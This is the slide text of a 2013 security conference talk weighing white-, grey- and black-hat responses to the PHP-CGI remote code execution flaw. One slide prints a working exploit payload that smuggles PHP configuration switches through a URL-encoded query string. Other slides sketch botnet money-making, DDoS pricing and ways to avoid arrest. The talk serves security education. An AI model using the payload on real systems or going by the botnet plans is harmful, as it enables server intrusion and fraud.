DOES IT PAY TO BE A
BLACKHAT HACKER?
DefCamp Romania – November 29, 2013
Speaker: Dan Catalin VASILE

About me
• Information Security Consultant
• OWASP Romania Board Member
• InfoSec Researcher / Writer / Presenter
dan@pentest.ro
http://www.pentest.ro

Agenda
•
•
•
•
What is a hacker?
Different types of hats
A real world vulnerability
Exploitation
– White
– Grey
– Black
• Gains and risks
• Conclusion

What is a hacker?
Original definition (MIT 1960s & RFC 1392)
A person who delights in having an intimate
understanding of the internal workings of a system,
computers and computer networks in particular.
Main-stream media definition & general public
acceptance (also in RFC 1392)
Mass media and general public's usage of the word
hacker refers to security breakers motivated mainly by
financial gains.
Hackers may be motivated by a multitude of reasons,
such as profit, protest, or challenge.

Different kinds of hats
White hat
An ethical computer hacker, or a computer security expert, who
specializes in penetration testing and in other testing
methodologies to ensure the security of an organization's
information systems.
Grey hat
A skilled hacker whose activities fall somewhere between white
and black hat hackers in a variety of practices. Sometimes he acts
illegally, though in good will, to identify vulnerabilities in
computing processes.
Black hat
A hacker who violates computer security for little reason beyond
maliciousness or for personal gain.

A real world vulnerability
Apache Web Server :: remote code execution
Where?
In the default installation of php5-cgi package.
The problem
PHP-CGI-based setups contain a vulnerability when parsing query
string parameters from php files.
Description
When the php-cgi receives a processed query string parameter as
command line arguments which allows command-line switches,
such as -s, -d or -c to be passed to the php-cgi binary, which can
be exploited to disclose source code and obtain arbitrary code
execution.

A real world vulnerability
Apache Web Server :: remote code execution
The vulnerability
In the source code file sapi/cgi/cgi_main.c of PHP we can see that
the security check is done when the php.ini configuration setting
cgi.force_redirect is set and the php.ini configuration setting
cgi.redirect_status_env is set to NULL.
STD_PHP_INI_ENTRY("cgi.force_redirect","1", PHP_INI_SYSTEM, OnUpdateBool,force_redirect,
php_cgi_globals_struct, php_cgi_globals)
STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString,
redirect_status_env, php_cgi_globals_struct, php_cgi_globals)
It is possible to set cgi.force_redirect to zero and
cgi.redirect_status_env to zero using the -d switch so that php-cgi
gets fully executed and we can use the payload in the POST data
field to execute arbitrary php.

A real world vulnerability
Apache Web Server :: remote code execution
Impact!!!
A remote unauthenticated attacker could obtain sensitive
information, cause a denial of service condition or may be able to
execute arbitrary code with the privileges of the web server.

A real world vulnerability
Apache Web Server :: remote code execution
Exploitation PoC
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64"
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73"
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E"
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63"
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62"
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74"
"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68"
"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F"
"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63"
"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73"
"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1rn"
"Host: %srn"
"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26"
"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Content-Length: %drn"
"Connection: closernrn%s";
-d
allow_url_include=on
-d
safe_mode=off
-d
suhosin.simulation=on
-d
disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d
cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

A real world vulnerability
Apache Web Server :: remote code execution
Show me the numbers

A tale of three
Alice
Bob
Mallory

What are the options?
Responsible disclosure
- Let Apache know about the problem
- Let them fix it
- Allow “some” time for the patch to be installed on most (??)
of the systems
- Make the public announcement and get the credit
- For some cash you can make Google pay for it
A list of bug bounties programs:
https://bugcrowd.com/list-of-bug-bounty-programs/

What are the options?
Sell the vulnerability to a broker
- TippingPoint's Zero-Day Initiative
- iDefense's Vulnerability Contributor Program
- Vupen’s Threat Protection Program

What are the options?
Exploit it on your own!
- Small scale
-
A few selected targets
- Very large scale
-
Internet size attack
Create a botnet of servers

White Hat Alice
Employer: big consulting corporation
Annual net income: ~$80.000
Approach:
- Responsible disclosure
Gains:
- Fame
- ~$3k / reporting the vulnerability
https://www.google.com/about/appsecurity/patch-rewards/
Risks:
- Mainly risk free

Grey Hat Bob
Employer: small web-hosting provider
Annual net income: ~$45.000
Approach:
-
Exploit it on a small scale
Sell it to a broker
Disclose it anonymously
Gains:
-
No fame, just some fortune
$50k from the broker
~$15k / year
Risks:
-
Legal charges for hacking

Black Hat Mallory
Employer: self-employed/freelancer
Annual net income: ~$20.000
Approach:
-
Exploit it on a ‘never-seen’ scale
Phase 1

Black Hat Mallory
Phase 2
Scale? Millions of machines (10+)

Black Hat Mallory
Uses for the botnet
•
•
•
•
•
•
•
•
Distributed Denial-of-Service Attacks
Spamming
Sniffing Traffic
Spreading new malware
Advertisement services abuse
Manipulating pools/games/etc
Mass identity theft
Many others

Black Hat Mallory
DDOS
Market price:
$200/10k bots/day
Mallory’s price?
~200k/day/client
Multiple clients
He can literally make millions every day.

Black Hat Mallory
DDOS
Spamhaus DDOS attack
When?
March 2013
How big?
300Gbps

Black Hat Mallory
Risks?
Besides being the most wanted cyber-criminal ever? 
Going to jail!
Side thoughts
- He only uses Bitcoins or alternative untraceable payment
options
- He uses money mules to cash out
- The botnet gets divided
- He moves to a country with no extradition treaty

Aftermath
It takes months (years?) for the Internet to recover after such a
breach.
Patching, releasing, clean install, removing all the infections is a
painfully long process since the botnet tries to reactivate.
What was real and what was not?
- Apache PHP Vulnerability – REAL
- PoC – REAL
- the impact – not so real
-Black-hat exploitation – science-fiction, yet doable

A tale of three
Alice
Bob
Mallory

Conclusions
Are there any?
Does it pay to be blackhat?
It does. Financially. Only!
Do we hunt all blackhats down?
Different shades of gray.

Thank you
dan@pentest.ro
http://www.pentest.ro